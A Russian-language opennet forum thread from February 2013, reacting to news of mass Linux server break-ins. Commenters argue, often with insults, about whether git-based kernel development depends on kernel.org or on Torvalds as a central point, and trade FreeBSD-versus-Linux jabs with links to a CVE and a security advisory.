448. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 06:15 
>> прямо так живенько вырисовывается картинка с хомячками, каждый получил свою семечку, разбежались
>> по углам, повернулись друг к другу задом и точат и точат...
> Ну вот хомячиный умишко никак не может понять - что за D
> такое в слове DVCS. Они почему-то думают что есть центральная кормушка
> с семечками, являющаяся каким-то непререкаемым авторитетом. Что, мягко говоря, не соответствует
> действительности.

да нет, хомячки прекрасно понимают, что семечки может собирали с разных полей, и даже везли разными поездами, но последняя миля у них была в одном кульке, а значит и слияние было...

Ответить | Правка | ^ к родителю #374 | Наверх | Cообщить модератору

565. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 21:09 
> в одном кульке, а значит и слияние было...

Мержи конечно происходят, только вот с чего дебилоиды взяли что кернелорг является центром вселенной - совершенно не понятно. Почему-то при отпадении оного мержинг и синхронизация опять же не прекратились. Не знаете почему? И главное - как же это господа разработчики все это делали, если "центральному серверу" вообще каюк? :)

Ответить | Правка | ^ к родителю #448 | Наверх | Cообщить модератору

480. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 12:49 
даже хомячки понимают - что архив с так называемым релизом - почему-то режутся из одного места, и разработчики простят некого Торвалдьса сделать pull и забрать изменения в одно _центральное_ место.
То есть полная копия есть только в одном месте..

Мы конечно понимаем что потом можно сделать обратную синхронизацию, но это не отменяет факта что синхронизироваться будут с kernel.org а не со всеми 100 тысячь питсот репозиториями тех кто делал патчи.

Так что там о децентрализованности?

Ответить | Правка | ^ к родителю #374 | Наверх | Cообщить модератору

481. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 12:59 
> даже хомячки понимают - что архив с так называемым релизом - почему-то
> режутся из одного места, и разработчики простят некого Торвалдьса сделать pull
> и забрать изменения в одно _центральное_ место.
> То есть полная копия есть только в одном месте..

git help tag
hg help tag
fossil help tag

может, хватит уже сверкать дебилизмом?

Ответить | Правка | ^ к родителю #480 | Наверх | Cообщить модератору

518. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 15:09 
может хватит сверкать дибилизмом - что бы понять что что бы tag разошелся с головы дерева к ветвям - надо что бы в одном месте его поставили. и это место - комп торвальдса.

Да, потом уже он будет на других местах - но изначально все пойдет из одной точки.

Ответить | Правка | ^ к родителю #481 | Наверх | Cообщить модератору

520. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 15:13 
> может хватит сверкать дибилизмом - что бы понять что что бы tag
> разошелся с головы дерева к ветвям - надо что бы в
> одном месте его поставили. и это место - комп торвальдса.

Ахуенное открытие. Нобелевская премия, не иначе.

Я ещё одно подскажу. Чтобы исходник появился, его нужно написать в одном месте. И чтобы он разошёлся с головы дерева к ветвям, нужно, чтобы в одном месте его написали. И это место - комп разработчика.

Спасибо за бред. Это даже круче, чем я ожидал.

Ответить | Правка | ^ к родителю #518 | Наверх | Cообщить модератору

533. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 16:12 
да да, и объясни мне сирому как исходник с компа одного разработчика появляется на компе другого?
Без обмена этим на компе торвальдса.
где сливаются все изменения.
Ответить | Правка | ^ к родителю #520 | Наверх | Cообщить модератору

548. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Crazy Alex (ok) on 20-Фев-13, 19:15 
Оно вообще в курсе, как происходит разработка ядра и как там код летает? Ёлы-палы, ну нельзя же настолько откровенную чушь нести...
Ответить | Правка | ^ к родителю #533 | Наверх | Cообщить модератору

554. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 19:41 
> Оно вообще в курсе, как происходит разработка ядра и как там код
> летает? Ёлы-палы, ну нельзя же настолько откровенную чушь нести...

да да. чушь несете вы. Я все еще надеюсь услышать  - как святой дух разносит по всему миру тэги из дерева торвальдса - которые отмечают точку релиза.

Ответить | Правка | ^ к родителю #548 | Наверх | Cообщить модератору

568. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 21:24 
> как святой дух разносит по всему миру тэги из дерева торвальдса

Ну не святой дух, а git. Массой разных способов. Вплоть до флоппинета, если оно кому-то надо. С хрена ли кернелорг при этом какой-то там священный грааль? И как тогда разработчики разрабатывали пока кернелорг был в дауне, а? :)

Ответить | Правка | ^ к родителю #554 | Наверх | Cообщить модератору

681. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 21-Фев-13, 20:20 
напомню - что Торвальдс сделал тогда новый святой грааль - но на github.
но грааль никуда не пропал - как была центральная точка, так и осталась.
Ответить | Правка | ^ к родителю #568 | Наверх | Cообщить модератору

549. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 20-Фев-13, 19:21 
Раз признаешь, что сирый (убогий, кстати, тоже) - так и быть, объясню. У Торвальдса собираются изменения только от маинтайнеров подсистем. У них у всех, как и у Торвальдса, репозитории свободно доступны на чтение всему миру со всеми своими ветками и любой заинтересованный разработчик может посмотреть, что делает сосед. И смотрит - как минимум в тех частях, что рядом с его кодом, но часто - и просто потому что какая-то проблема интересна и хочется видеть, как её решают. Да и между рядовыми разработчиками ветки летают только так. И после пулла разработчик изменения смотрит - они могут и его деятельность затронуть. А уж если попытаться сделать pull того, что изменилось с предыдущего пулла (хоть подменой какой, хоть глупым ребейзом) - гит материться будет достаточно громко, чтобы на это обратили внимание.
Ответить | Правка | ^ к родителю #533 | Наверх | Cообщить модератору

553. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от linux must _RIP_ on 20-Фев-13, 19:40 
>[оверквотинг удален]
> всех, как и у Торвальдса, репозитории свободно доступны на чтение всему
> миру со всеми своими ветками и любой заинтересованный разработчик может посмотреть,
> что делает сосед. И смотрит - как минимум в тех частях,
> что рядом с его кодом, но часто - и просто потому
> что какая-то проблема интересна и хочется видеть, как её решают. Да
> и между рядовыми разработчиками ветки летают только так. И после пулла
> разработчик изменения смотрит - они могут и его деятельность затронуть. А
> уж если попытаться сделать pull того, что изменилось с предыдущего пулла
> (хоть подменой какой, хоть глупым ребейзом) - гит материться будет достаточно
> громко, чтобы на это обратили внимание.

:-) смешной вы. Локальные ветки они у каждого свои. А что касатеся кого могут затронуть - если вы так уж пытаетесь кичиться разработкой ядра. То вспомините правило - что изменения в то что затронул делает тот кто меняет.
И еще дальше вспоминет - что то что называют "релиз" не существует нигде в другом месте - только у торвальдса. А разговор напомню идет о релизе - а он такая сволочь - что может быть только в одном месте..
А что касается ругани git при pull/rebase - так они возникают у торвальдса
Да да мы все помним письма в lkml - please pull from .....
а не берут маинтейнеры и вливают сами по себе.

В любом случае у любого отдельного человека - есть только часть - а итоговый результат - и эталонная точка которой привещивается tag - делается только 1 человеком - Торвальдсом.
_ОДНИМ_

А дальше эта метка (тэг) расползается по всем копиям (клонам).

Я достаточно объяснил - что тэг релиза не может возникнуть просто так на всех машинах пользователей без синхронизации с компьютером Торвальдса? А без этого тэга называть что-то релизом - смешно.


Ответить | Правка | ^ к родителю #549 | Наверх | Cообщить модератору

567. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 21:22 
> И еще дальше вспоминет - что то что называют "релиз" не существует
> нигде в другом месте - только у торвальдса.

Это может придумать только дятел который DVCS видел только на картинках. Нет, мержинг конечно делает Торвальдс, но это не значит что результат только у него.

Ответить | Правка | ^ к родителю #553 | Наверх | Cообщить модератору

612. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от Аноним (??) on 21-Фев-13, 04:09 
>> И еще дальше вспоминет - что то что называют "релиз" не существует
>> нигде в другом месте - только у торвальдса.
> Это может придумать только дятел который DVCS видел только на картинках. Нет,
> мержинг конечно делает Торвальдс, но это не значит что результат только
> у него.

и DVCS тут не причем, то же самое может любая VCS, рассказать вам, например, про svn co?
сдается мне, что вы ничего не видели кроме git-а.

Ответить | Правка | ^ к родителю #567 | Наверх | Cообщить модератору

615. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 21-Фев-13, 05:06 
>>> И еще дальше вспоминет - что то что называют "релиз" не существует
>>> нигде в другом месте - только у торвальдса.
>> Это может придумать только дятел который DVCS видел только на картинках. Нет,
>> мержинг конечно делает Торвальдс, но это не значит что результат только
>> у него.
> и DVCS тут не причем, то же самое может любая VCS, рассказать
> вам, например, про svn co?
> сдается мне, что вы ничего не видели кроме git-а.

Если центральный сервер svn скомпроментирован, то он тебе и будет на чекаут выдавать поддельные данные, и заметить это гораздо сложнее.

А в git у всех будут идентичные коммиты, и если это тэг '3.2.8', значит у всех и будет этот 3.2.8, идентичный натуральному. В Европе и лучших домах Филадельфии, а также у меня дома под небольшой нагрузкой - вообще нет никакого "архива с релизом", а есть только архив, который автоматически получается через веб-интерфейс hg или rhodecode с помощью hg archive. И точно такой же архив может быть сгенерирован с любого клона, по ревизии/тэгу.

Суть в том, что у всех данные идентичные, и не может быть никаких "внезапных коммитов без истории". Нет, можно, конечно, написать "linux mustdie", но с таким же успехом можно написать это на стене, или, вон, как масдай - у себя на лбу. Никто не пропустит плохой коммит. А если вдруг так случится, что кто-то ответственный будет похищен агентами Баллмера и под пытками внесёт такой коммит - то его увидят все, моментально, он отразится во всех логах. Нельзя никак втащить коммит тайно, незаметно, или подменить историю - все коммиты на виду, и люди обычно делают git diff, чтобы посмотреть, что же там за патчик пришёл.

Но опять же - это какая-то космическая вероятность. Коммит от невесть кого вызовет подозрение сразу, а чтобы сделать неподозрительный коммит - намного дешевле просто перестрелять всех лидеров opensource и им сочувствующих, и этим внести смуту.

Ответить | Правка | ^ к родителю #612 | Наверх | Cообщить модератору

569. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 21:37 
> Без обмена этим на компе торвальдса.

А кернелорг тут при чем? Ну да, несомненно, у разработчиков есть компьютеры. Они на них что-то делают. Но эти компьютеры не являются кернелоргом. Ну что, обтекайте теперь, если столь простой момент до вас так туго допирает.


Ответить | Правка | ^ к родителю #533 | Наверх | Cообщить модератору

614. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от Аноним (??) on 21-Фев-13, 04:19 
>> Без обмена этим на компе торвальдса.
> А кернелорг тут при чем? Ну да, несомненно, у разработчиков есть компьютеры.
> Они на них что-то делают. Но эти компьютеры не являются кернелоргом.
> Ну что, обтекайте теперь, если столь простой момент до вас так
> туго допирает.

Слушай обтекатель, прежде чем писать, нужно читать, фирштейн?
http://www.opennet.dev/openforum/vsluhforumID3/88727.html#341

Ответить | Правка | ^ к родителю #569 | Наверх | Cообщить модератору

661. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 17:46 
> Слушай обтекатель, прежде чем писать, нужно читать, фирштейн?

Я то ферштейн. А вот вы к себе это примените еще, да? То орали о том что взлом кернелорга все нагибает, то оказывается что он всем похрену и ломать если что и надо - то конкретных разработчиков уже. Надо же, какое эпичное прозрение у этих, которые cannot into dvcs.

Ответить | Правка | ^ к родителю #614 | Наверх | Cообщить модератору

664. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 21-Фев-13, 17:55 
>> Слушай обтекатель, прежде чем писать, нужно читать, фирштейн?
> Я то ферштейн. А вот вы к себе это примените еще, да?
> То орали о том что взлом кернелорга все нагибает, то оказывается
> что он всем похрену и ломать если что и надо -
> то конкретных разработчиков уже. Надо же, какое эпичное прозрение у этих,
> которые cannot into dvcs.

не... читать ты точно не умеешь...

Ответить | Правка | ^ к родителю #661 | Наверх | Cообщить модератору

566. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 21:18 
> То есть полная копия есть только в одном месте..

Надо же быть таким идиотом с искалеченным централизацией мозгом.
1) А это, вы уверены что Торвальдс у лично вас сделает pull с вашим трояном? Вы такой убедительный чувак, который к тому же не боится засрать себе репутацию на весь остаток жизни?
2) Вообще-то гит на то и DVCS что у каждого на руках при желании есть именно полная копия со всеми наворотами. Со всеми коммитами, тэгами, бранчами и чем там еще. Если этого хотелось - оно таки у вас будет. И по ним всем можно шариться наздоровье, переключаясь на то или иное состояние. Получив это в состоянии "как видел разработчик в такой-то момент".  И все это - без сливания на каждый пук кучи мегазов с ремотных серверов.

Нету там разве что того над чем разработчики работают ну вот прямо сию секунду и еше не синхрили между собой.

Ответить | Правка | ^ к родителю #480 | Наверх | Cообщить модератору

613. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 21-Фев-13, 04:13 
> 1) А это, вы уверены что Торвальдс у лично вас сделает pull
> с вашим трояном? Вы такой убедительный чувак, который к тому же
> не боится засрать себе репутацию на весь остаток жизни?

вопрос не про нас, а про разработчиков. некий разработчик не в курсе, что он сломан.

> 2) Вообще-то гит на то и DVCS что у каждого на руках
> при желании есть именно полная копия со всеми наворотами. Со всеми
> коммитами, тэгами, бранчами и чем там еще. Если этого хотелось -
> оно таки у вас будет.

а прилетает оно мне из космоса или откуда?

Ответить | Правка | ^ к родителю #566 | Наверх | Cообщить модератору

631. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 12:41 
> вопрос не про нас, а про разработчиков. некий разработчик не в курсе, что он сломан.

Ах, оказывается кернелорг ломать уже не требуется? Требуется ломать конкретных разработчиков?

Но да, я таки думаю что если разработчик ядра да вдруг не заметит что его взломали - хана его репутации. Как же он кернел разрабатывает, если не контролирует что у него на машине творится даже? А как он тогда кернел отлаживает и проблемы ловит?

>> коммитами, тэгами, бранчами и чем там еще. Если этого хотелось - оно таки у вас будет.
> а прилетает оно мне из космоса или откуда?

Оно не "прилетает". Разработчик явно говорит: "хочу тебе вкатить фичу X". Ну и тот кто ее будет мержить - забирает соотв. группу коммитов. Это называется pull request. Он инициируется разработчиком фичи по мере готовности кода, если момент времени правильный.

Но как сказал arisu, "мyдaки cannot into dvcs". Походу реально cannot.

Ответить | Правка | ^ к родителю #613 | Наверх | Cообщить модератору

632. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 21-Фев-13, 12:55 
> Оно не "прилетает". Разработчик явно говорит: "хочу тебе вкатить фичу X". Ну
> и тот кто ее будет мержить - забирает соотв. группу коммитов.
> Это называется pull request. Он инициируется разработчиком фичи по мере готовности
> кода, если момент времени правильный.

Кстати, о киллер-фичах. В svn можно хоть тушкой, хоть чучелом, сделать аналог pull request?

Ответить | Правка | ^ к родителю #631 | Наверх | Cообщить модератору

662. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 17:50 
> Кстати, о киллер-фичах. В svn можно хоть тушкой, хоть чучелом, сделать аналог pull request?

Так сходу затрудняюсь себе вообразить такой стиль работы через svn. Ну не заточен он на такое. Можно ли так изогнуться с помощью костылей - у тигара и прочих спроси, пусть поблещут сообразительностью в очередной раз :).

Ответить | Правка | ^ к родителю #632 | Наверх | Cообщить модератору

686. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 22-Фев-13, 00:23 

>>> коммитами, тэгами, бранчами и чем там еще. Если этого хотелось - оно таки у вас будет.
>> а прилетает оно мне из космоса или откуда?
> Оно не "прилетает". Разработчик явно говорит: "хочу тебе вкатить фичу X". Ну
> и тот кто ее будет мержить - забирает соотв. группу коммитов.
> Это называется pull request. Он инициируется разработчиком фичи по мере готовности
> кода, если момент времени правильный.

вот значит оказывается есть центральная точка - которая у всех забирает.
Теперь вам осталось признать что все эти разработчики используют эту точку как эталон.
И не надо прикрываться что можно сделать тоже самое самому.
А значит по факту есть центральная точка - то что вы и признать не хотите.

Ответить | Правка | ^ к родителю #631 | Наверх | Cообщить модератору

687. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 22-Фев-13, 02:41 
> вот значит оказывается есть центральная точка - которая у всех забирает.
> Теперь вам осталось признать что все эти разработчики используют эту точку как
> эталон.
> И не надо прикрываться что можно сделать тоже самое самому.
> А значит по факту есть центральная точка - то что вы и
> признать не хотите.

Наташа, если ничего не помогает, прочти же, наконец, инструкцию.

- Уничтожается центральный репозиторий, скажем svn. Все остаются без репозитория, без истории, без всего.
- Уничтожается 'центральный' репозиторий в git. Практически ничего не изменилось, можно взять любой другой и сказать - теперь ты 'центральный'. Или вот он.
- Уничтожается linuxmustrip. Все радуются, поют песни и даже ощущают, что воздух стал чище и консистенция ума прибавилась.

Разумеется, 'центральный' репозиторий есть. Чтобы юзерам было, куда ходить. И потому что правом выпуска обладает только Торвальдс. Какой-то код могут не принять, и правильно сделают, но суть не в этом. Суть в проверке подлинности, что-то тайно подсунуть задним числом не может не Торвальдс, ни даже ты, Наташенька, со всей своей логикой девочки-подростка в момент созревания (задаём один вопрос, а требуем ответа на другой).

Ответить | Правка | ^ к родителю #686 | Наверх | Cообщить модератору

696. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 22-Фев-13, 10:35 
>> вот значит оказывается есть центральная точка - которая у всех забирает.
>> Теперь вам осталось признать что все эти разработчики используют эту точку как
>> эталон.
>> И не надо прикрываться что можно сделать тоже самое самому.
>> А значит по факту есть центральная точка - то что вы и
>> признать не хотите.
> Наташа, если ничего не помогает, прочти же, наконец, инструкцию.
> - Уничтожается центральный репозиторий, скажем svn. Все остаются без репозитория, без истории,
> без всего.

откройте уж для себя варианты с зеркалированием локально репы. А для cvs были даже пожелания в FreeBSD handbook как реализовать такую работу через cvsup.
Ровно так же уничтожение "центрального" сервера - не приносит никаких проблем.

И если вам не известны подобные механизмы - то не значит что их нет, это лишь говорит о вашей слабой подготовке и юном возрасте.

> - Уничтожается 'центральный' репозиторий в git. Практически ничего не изменилось, можно
> взять любой другой и сказать - теперь ты 'центральный'. Или вот
> он.

Вносится изменения в этот репозиторий - и они оказываются разом у всех..
То есть вот он центральный то..
А когда накрыли kernel.org - почему-то пришлось заново делать новый центральный..
Хотя git весь такой децентрализованый


Ну хорошо что вы наконец признали что есть центральная точка. Куда можно внести втихую изменения и эти изменения попадут всем юзерам.. Осталось еще быть самокритичнее к себе.
На счет поиска следов взлома - вы уже облажались, теперь облажались тут и пытаетесь перевести стрелки..

Буратина он был такой деревянный..

PS. hint, git не всегда делает копию всего всего - так что при удалении центральной репы с gerrit - ты лишаешся всего что в процессе review. если не принимать спец телодвижения.
Почти таже ситуация что с svn/cvs.

Ответить | Правка | ^ к родителю #687 | Наверх | Cообщить модератору

699. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 22-Фев-13, 10:47 
> откройте уж для себя варианты с зеркалированием локально репы.

Которая ничего не даст в указанном случае. Вместо одного поддельного зеркала будут два, или три.

_*/[big][font=7][ахуетьневстать][разоблачениевека]ПОТОМУ ЧТО В SVN ЛОКАЛЬНАЯ КОПИЯ ЭТО ФАЙЛЫ А В GIT ЭТО СЕРИЯ ПАТЧЕЙ

Ответить | Правка | ^ к родителю #696 | Наверх | Cообщить модератору

689. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 22-Фев-13, 02:49 
> вот значит оказывается есть центральная точка - которая у всех забирает.
> Теперь вам осталось признать что все эти разработчики используют эту точку как
> эталон.
> И не надо прикрываться что можно сделать тоже самое самому.
> А значит по факту есть центральная точка - то что вы и
> признать не хотите.

Кстати, суслик, подскажи, если знаешь:

Вот у меня есть один компьютер, куда постоянно по cron с git/hg синхронизируются интересующие меня проекты, прямо в мой rhodecode - я там смотрю дифы, наборы изменений и делаю многое другое, что позволяет делать эта Чтука.

На втором компьютере у меня есть зеркало всех нужных мне транков, куда я скриптом собираю все транки. Так вот, там есть и те, которые я забираю с первого компьютера, чтобы они были все под рукой.

Внимание, вопрос: какой из репозиториев для этих транков - центральный?

Ответить | Правка | ^ к родителю #686 | Наверх | Cообщить модератору

456. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 07:09 
> Не больно какая разница, один хрен хост под реинсталл, т.к. мало ли
> кто, чего и где не заметил. Зато у пингвиноидов самое ценное
> что там было, т.е. сорец линя защищен DVCSом от левых вбросов
> коммитов задним числом в силу принципов его работы.

http://paperdogvideo.com/wp-content/uploads/2012/07/Spoon400...

Ответить | Правка | ^ к родителю #137 | Наверх | Cообщить модератору

97. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +5 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:40 
> Счет пошел на десятки, если не сотни.

Когда червь-троян-иликтотам крал с windows машин пароли на разные ftp и прочие путти, и по ним охмурял linux-машины, пострадавших было больше.

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

302. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 19:15 
> с немного другой стороны - сказали что недавно проломили php - и
> через него залили архивчик с несколькими эксплойтами под ядро + на
> всякий случай - под гипервизоры, но так как там был не
> linux, то народ обломался.

http://juick.com/blacklion/2240395

Народ должен знать своих героев. :-)

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

305. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 19:20 
> http://juick.com/blacklion/2240395
> Народ должен знать своих героев. :-)

Хорош герой - 6 троянов на сервант собрал. И что-то наличие фри не помешало их на сервак собрать.


Ответить | Правка | ^ к родителю #302 | Наверх | Cообщить модератору

351. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 20:55 
А почему не герой? Именно что герой: подставил свои сервера (это, впрочем, скорее всего ненамеренно), дал время троянам поработать (тоже ненамеренно), выявил их возможности (возможно не все) и сдал всё это доктору. Спасибо ему сказать надо. Обратите внимание, что заметил трояны он скорее всего благодаря тому, что использует FreeBSD.
Ответить | Правка | ^ к родителю #305 | Наверх | Cообщить модератору

368. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от pavlinux (ok) on 19-Фев-13, 21:22 
ФриБЗДя - рышыто

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2632

Ответить | Правка | ^ к родителю #351 | Наверх | Cообщить модератору

392. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 19-Фев-13, 21:57 
> ФриБЗДя - рышыто
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2632

дыа!1

Ответить | Правка | ^ к родителю #368 | Наверх | Cообщить модератору

401. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 22:22 
> дыа!1

Лол, потом не отмазывайся что ты этого не говорил :)

Ответить | Правка | ^ к родителю #392 | Наверх | Cообщить модератору

408. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 19-Фев-13, 22:37 
>> дыа!1
> Лол, потом не отмазывайся что ты этого не говорил :)

дак а чо отмазываться-то? вот оно, доступно всем: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:02....
власти не скрывают.

Ответить | Правка | ^ к родителю #401 | Наверх | Cообщить модератору

660. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 17:38 
> власти не скрывают.

Конкретно зацитированное какое-то не очень страшное даже. Ну то-есть, теоретически хаксор может что-то завалить. Практически - скорее всего найдется масса не менее эффективных способов.

Ответить | Правка | ^ к родителю #408 | Наверх | Cообщить модератору

663. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от тигар (ok) on 21-Фев-13, 17:51 
>> власти не скрывают.
> Конкретно зацитированное какое-то не очень страшное даже. Ну то-есть, теоретически хаксор
> может что-то завалить. Практически - скорее всего найдется масса не менее
> эффективных способов.

надо же! в тебе зарождается интеллект. внезапно как-то

Ответить | Правка | ^ к родителю #660 | Наверх | Cообщить модератору

671. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Sem (??) on 21-Фев-13, 18:25 
> ФриБЗДя - рышыто
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2632

Зато нет такого: "Ой, десятки, если сотни серверов под линь сломаны и мы не знаем как".

Ответить | Правка | ^ к родителю #368 | Наверх | Cообщить модератору

372. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от тигар (ok) on 19-Фев-13, 21:25 
> А почему не герой? Именно что герой: подставил свои сервера (это, впрочем,
> скорее всего ненамеренно), дал время троянам поработать (тоже ненамеренно), выявил их
> возможности (возможно не все) и сдал всё это доктору. Спасибо ему
> сказать надо. Обратите внимание, что заметил трояны он скорее всего благодаря
> тому, что использует FreeBSD.

лет 6 назад наблюдал за активностью 1 смешной зверюшки, через дырку в 1 пхп-щной хреньки залезла и пыталась wget`ом чего-то качать. тогда я ржал громко. а щас попытки луноходов запустить на фре wget, bash и mc уже даже улыбку не вызывают.


Ответить | Правка | ^ к родителю #351 | Наверх | Cообщить модератору

381. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 19-Фев-13, 21:38 
> и mc уже даже улыбку не вызывают.

Да, фрибзда настолько фэйловая ос что там даже вирье фэйлит :).

Ответить | Правка | ^ к родителю #372 | Наверх | Cообщить модератору

391. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от тигар (ok) on 19-Фев-13, 21:55 
>> и mc уже даже улыбку не вызывают.
> Да, фрибзда настолько фэйловая ос что там даже вирье фэйлит :).

скорее писатели зверьков сильно тупые.
вот, как пример, http://pastebin.com/4hZC5zLy (12 августа 2011 год). судя по всему, с тех пор они не поумнели, скорее в их полку прибыло, спасибо космонавту с его халявными подставками для кружек.

Ответить | Правка | ^ к родителю #381 | Наверх | Cообщить модератору

403. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 22:24 
> вот, как пример, http://pastebin.com/4hZC5zLy (12 августа 2011 год).

Что это за жаба-хрень? Я уже по изену убедился какие жабисты "умные". Кстати он из ваших, бсдшников. Что не мешает ему быть абсолютной деревяхой, не отличающей сисколы от компилеров :)

Ответить | Правка | ^ к родителю #391 | Наверх | Cообщить модератору

409. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от тигар (ok) on 19-Фев-13, 22:40 
>> вот, как пример, http://pastebin.com/4hZC5zLy (12 августа 2011 год).
> Что это за жаба-хрень? Я уже по изену убедился какие жабисты "умные".
> Кстати он из ваших, бсдшников. Что не мешает ему быть абсолютной
> деревяхой, не отличающей сисколы от компилеров :)

ну эм.. если присмотреться внимательно, можно легко заметить, что я раз 100 изе говорил, чтобы он шел в убунтоводы и их опускал еще больше своими репликами.
но тебе-то, не деревяхе, должно быть абсолютно похрен на чем тот чудо код. я вот жаву не знаю и мне, например, очевидно, что тот код делает.

Ответить | Правка | ^ к родителю #403 | Наверх | Cообщить модератору

571. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 21:47 
> ну эм.. если присмотреться внимательно, можно легко заметить, что я раз 100
> изе говорил, чтобы он шел в убунтоводы и их опускал еще больше своими репликами.

Да ладно, по-моему, такие как ты, изен и прочие нагуалы вполне неплохо показывают кто и почему бзди нынче юзает. А те кому было ехать а не шашечки и понты - давно слиняли на пингвин. А понтоваться операционкой - удел тех кому больше понтануться ну вобще совсем нечем.

> но тебе-то, не деревяхе, должно быть абсолютно похрен на чем тот чудо код.

Э нет. Как раз некий опыт подсказывает мне что выбор ЯП довольно много говорит об авторе. И если это java - это или энтерпрайзные быдлокодеры, или какие-то скрипткидисы типа изена. В данном случае наиболее вероятно именно второе.

> я вот жаву не знаю и мне, например, очевидно, что тот код делает.

Да не, дело то не в том. Разобраться в этом коде и я могу, хоть и не знаю жавы. Но вот ожидать слишком многого от того кто такое пишет на жаве - это как правило большая ошибка. Что можно ожидать от типичного програмера на яве - прекрасно видно на примере изена.

Ответить | Правка | ^ к родителю #409 | Наверх | Cообщить модератору

576. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 20-Фев-13, 22:49 
>> ну эм.. если присмотреться внимательно, можно легко заметить, что я раз 100
>> изе говорил, чтобы он шел в убунтоводы и их опускал еще больше своими репликами.
> Да ладно, по-моему, такие как ты, изен и прочие нагуалы вполне неплохо
> показывают кто и почему бзди нынче юзает. А те кому было

сказал усёр294 который уже даже и логиниться под собой очкует?;) знаешь, тебя и под ананимом узнать можно, так что обосрать ананимов ты конечно можешь, подписавшись им, но только в глазах тех, кто тебя, недалекого, не умеет детектить;)

> ехать а не шашечки и понты - давно слиняли на пингвин.
> А понтоваться операционкой - удел тех кому больше понтануться ну вобще
> совсем нечем.

сказал Счастливый Обладатель никЫя n900 (?). ты его еще не спустил в унитаз от горя-то?;)
